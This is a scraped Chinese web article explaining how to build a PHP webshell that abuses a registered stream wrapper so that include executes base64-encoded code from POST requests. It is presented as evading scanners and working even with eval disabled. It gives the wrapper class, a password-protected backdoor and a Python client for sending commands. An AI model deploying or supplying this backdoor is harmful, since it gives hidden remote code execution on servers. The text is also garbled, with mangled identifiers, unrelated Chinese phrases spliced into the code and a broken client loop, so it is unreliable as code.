首页 > 作文

PHP使用流包装器实现WebShell的方法

更新时间:2023-04-06 17:26:30 阅读: 评论:0

0×00 前言

在web安全领域webshell的构造与查杀是永不停息的话题,这几天发现了一种新型方式生成webshell,隐蔽度高,目前安全查杀软件没法检测到相关的后门漏洞,不同于 eval 或则 ast 等方式运行后门,对于这两个函数禁用的情况下一样适用,目前除了禁用相关函数还暂时没有相关方式来避免漏洞。

0×01 后门原理

在php开发中,我们使用最为频繁的指令大概就是 include 指令, include 指令中一些比较普通的文件包含漏洞我们就忽略了,先来看看一串代码:

include 'http://www.test.com/code.php'

我们通过这一串代码可以很容易的引用外部的php程序,但是前提是配置文件允许该行为被执行,先看看我的配置项

;;;;;;;;;;;;;;;;;;; fopen wrappers ;;;;;;;;;;;;;;;;;;;; whether to allow the treatment of urls (like http:// or ftp://) as files.; /d/file/titlepic/manual-lookup.php =off; whether to allow include/require to open urls (like http:// or ftp://) as files.; /d/file/titlepic/manual-lookup.php = off

从配置文件可以看到,allow_url_include 被我关闭了,也就是包含远程代码是不可能执行的,但是我们这里利用了一个东西。http:// 流,我们知道,在php中很多东西都是可以通过流包装器来使用的,比如常见的 php:// 流,我们可以通过 php://input 来获取输入流来读取请求体的内容,那么根据这个思路,我们能不能通过流包装器来实现代码执行?答案是可行的 通过php函数 stream_wrapper_register 注册包装器,检测特定的url包装功能,监控 include 流,在 include 流中动态生成php代码,我将通过如下代码执行一个 hello world 程序来证明这个过程

include 'hello://dxkite';

hello stream wrapper 的实现

code = "position = 0;  return true; } public function stream_read($count) {  $ret = substr($this->code, $this->position, $count);  $this->position += strlen($ret);  return $ret; } public function stream_tell() {  return $this->position; } public function stream_eof() {  return $this->position >12月花= strlen($this->code); } public function stream_ek($offt, $whence) {  switch ($whence) {   ca ek_t:    if ($offt < strlen($this->code) && $offt >= 0) {     $this->position = $offt;     return true;    } el {     return fal;    }    break;   ca ek_cur:    if ($offt >= 0) {     $this->position += $offt;     return true;    } el {     return fal;    }    break;   ca ek_end:    if (strlen($this->code) + $offt >林中文;= 0) {     $this->position = strlen($this->code) + $offt;     return true;    } el {     return fal;    }    break;   default:    return fal;  } } public function stream_stat() {  return stat(file); }}stream_wrapper_register('hello', hellostream::class);include 'hello://dxkite';

通过如上的代码,经过执行后,可以输出一个 hello worldhelloworld

0×02 后门示例

通过上述程序,我们实现了通过 include 指令直接执行 php ,并插入我们想要的效果,我们现在根据这个原理写一个shell:

后门程序

@link //dxkite.cn */class shellstream{ protected $position; protected $code; public function stream_open($path, $mode, $options, &$opened_path) {  $url = par_url($path);  $name = $url["host"];  $this->code = ba64_dec慈溪市第四实验小学ode($name);  $this->position = 0;  return true; } public function stream_read($count) {  $ret = substr($this->code, $this->position, $count);  $this->position += strlen($ret);  return $ret; } public function stream_tell() {  return $this->position; } public function stream_eof() {  return $this->position >= strlen($this->code); } public function stream_ek($offt, $whence) {  switch ($whence) {   ca ek_t:    if ($offt < strlen($this->code) && $offt >= 0) {     $this->position = $offt;     return true;    } el {     return fal;    }    break;   ca ek_cur:    if ($offt >= 0) {     $this->position += $offt;     return true;    } el {     return fal;    }    break;   ca ek_end:    if (strlen($this->code) + $offt >= 0) {     $this->position = strlen($this->code) + $offt;     return true;    } el {     return fal;    }    br300分能上什么学校eak;   default:    return fal;  } } // include public function stream_stat() {  return stat(file); } // file exists public function url_stat(string $path,int $stat) {  return stat(file); } public static function shell(){  stream_wrapper_register('shell', shellstream::class);  if (ist($_post['password']) && $_post['code']) {   if ($_post['password']=='dxkite') {    $code = $_post['code'];    include 'shell://'.$code;   } el {    include 'shell://pd9wahagzwnobyaiagvsbg8gagfjayi7';   }  } }}

shellstream::shell();

上述我实现了一个使用 $_post 作为输入,接收密码和php代码的ba64并执行代码的后门利用程序

import requests import ba64import sysdef nd_raw(url,password,cmd): res=requests.post(url,{  'password':password,  'code': ba64.b64encode(cmd.encode('utf-8'))  }) return res.textdef nd_php_shell(url,password,cmd): return nd_raw(url,password,'')  if cmd == 'exit':   break  elif cmd.startswith('run'):   cmd,path = cmd.split(' ',1)   code = ''   with open(path) as f:    for line in f:     code = code + line + "\r\n"    respon = nd_raw(url,password,code);   print(respon)  el:   respon = nd_php_shell(url,password,cmd);   print(respon)

我们把我们的 shell.php 部署到服务器上,执行测试 shell.py :

php-shell.png

其中,test.php 的内容为:

<?php include 'pd9wahagzwnobyaiagvsbg8gc2hlbgxcclxuijs'; echo 'hello, shell world';

0×03 后门查杀

百度在线扫描

安全狗本地扫描

总结

以上所述是www.887551.com给大家介绍的php使用流包装器实现webshell的方法,希望对调价通知函大家有所帮助

本文发布于:2023-04-06 17:26:09,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/dcd8d18343ff4059b2cd28071e387d0e.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:PHP使用流包装器实现WebShell的方法.doc

本文 PDF 下载地址:PHP使用流包装器实现WebShell的方法.pdf

标签:后门   代码   指令   程序
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图